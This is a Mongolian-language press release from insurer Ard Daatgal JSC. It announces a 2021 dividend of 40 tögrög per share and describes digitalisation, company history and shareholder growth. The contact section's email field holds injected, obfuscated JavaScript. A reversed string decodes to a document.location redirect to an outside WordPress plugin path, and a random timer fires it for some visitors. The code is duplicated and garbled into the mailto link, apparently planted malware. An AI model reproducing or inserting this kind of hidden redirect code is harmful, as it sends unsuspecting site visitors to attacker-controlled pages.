Ард Даатгал ХК-ийн Төлөөлөн Удирдах Зөвлөлийн 2022 оны 2 сарын 16-ны өдрийн тогтоолоор компанийн 2021 оны цэвэр ашгаас нийт 1 тэрбум төгрөг буюу нэгж хувьцаанд ногдох ногдол ашгийн хэмжээ 40 төгрөгөөр тооцон хувьцаа эзэмшигчдэд хуваарилахаар шийдвэрлэлээ. Мөн ногдол ашиг олгох бүртгэлийн өдрийг Хувьцаа эзэмшигчдийн хурлын бүртгэлийн өдрөөр байхаар тогтсон байна.

 

Ард Даатгал ХК-ийн хувьд 2021 онд даатгалын үйлчилгээгээ бүрэн цахимжуулах төлөвлөгөөт ажлын хүрээнд нөхөн төлбөрийн материал хүлээн авч шийдвэрлэх процессыг бүрэн автоматжуулан цахимаар шийдвэрлэж байгаа бөгөөд CRM, ERP системүүдийг сайжруулах, шинэчлэх зэргээр бүрэн цахимжсан үйлчилгээг иргэдэд үзүүлэх ажлуудыг хэрэгжүүлэн ажиллалаа.

Ард Даатгал ХК нь 1994 он байгуулагдсан бөгөөд даатгалын салбарын ууган хувийн компани юм. Ард Даатгал ХК нь Улаанбаатар, Дархан, Эрдэнэт хотууд болон 21 аймаг дахь салбарууд, 100 гаруй төлөөлөгчдөөс гадна томоохон банкууд, Монгол Шуудан компанитай стратегийн түншлэлийн гэрээний дагуу орон даяар шуудангийн салбаруудаар дамжуулан даатгалын бүх төрлийн бүтээгдэхүүн, үйлчилгээг түгээн ажиллаж байна.

 

2021 онд Ард Даатгал компани нийт 10,151 хувьцаа эзэмшигчидтэй болсон бөгөөд оны эхнээс 8,082 хувьцаа эзэмшигчээр буюу 5 дахин нэмэгдсэн нь манай компанийг сонирхож, итгэл хүлээлгэн хөрөнгө оруулалт хийх хөрөнгө оруулагчдын тоо өдөр ирэх тусам нэмэгдэж байгааг харуулж байна.

 

2022 онд компанийн зүгээс харилцагч, үйлчлүүлэгч нартаа шинэ бүтээгдэхүүн үйлчилгээг санал болгохын зэрэгцээ даатгалын үйлчилгээний хүртээмжийг илүү нэмэгдүүлэх, цахимжуулах зорилтыг тавин ажиллаж байна.

 

 

 

Дэлгэрэнгүй мэдээлэл авахыг хүсвэл бидэнтэй холбоо барина уу.

 

 

Хаяг: Сэнтрал тауэр, 13 давхар, 1305-1307 тоот, Сүхбаатар дүүрэг, 8 хороо, Сүхбаатарын талбай-2, Улаанбаатар хот, Монгол улс

Холбоо барих утас: 7720 0089

И-мэйл хаяг: toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:info@arddaatgal.mn”>info@arddaatgal.mn

 

Хүчтэй. Хамтдаа.

Share via: